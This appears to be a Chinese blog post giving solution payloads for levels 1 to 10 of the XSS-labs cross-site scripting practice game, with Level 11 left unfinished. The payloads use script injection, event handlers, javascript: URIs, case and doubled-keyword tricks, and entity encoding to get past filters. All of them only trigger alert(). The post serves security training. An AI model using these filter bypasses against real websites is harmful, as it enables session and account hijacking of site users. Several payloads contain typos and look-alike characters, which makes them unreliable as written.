XSS-labs通关游戏

Level 1

Palyload:name=<script>alert(/test/)</script>

Level 2

Playload:keyword="><script>alert(/xss/)</script><"

Level 3

Palyload:keyword=' οnmοuseοver=’alert(/xss/)

Level 4

Palyload:keyword=" οnmοuseοver='alert(/xss/)'

 Level 5

Playload:“><a href=”javascript:alert:alert(/xss/)”>click</a>

Level 6

Playload:keyword=" ONmouseover='alert(/xss/)'

 Level 7

Playload:keyword=" oonnmouseover='alert(/xss/)'

Playlaod:keyword="><a hhrefref="javascscriptript:alert(/xss/)">click</a>

 

Level 8

Playload:keyword=java&#x73;cript:alert(/xss/)

Playload:keyword=java&#115;cript:alert(/xss/)      html实体编码绕过

 

Level 9

Playload:keyword=java&#115;cript:alert('http://www.baidu.com')

 

Level 10

Playload:t_sort="  type="botton" οnmοuseοver='alert(/xss/)'

               t_sort=click" type="button" οnclick="alert(/xss/)"

查看源码:

 

测试发现:

  

结果:

Level 11

Playload:

稍等,测试中。。。

猜你喜欢

转载自blog.csdn.net/qq_44932745/article/details/125454552
今日推荐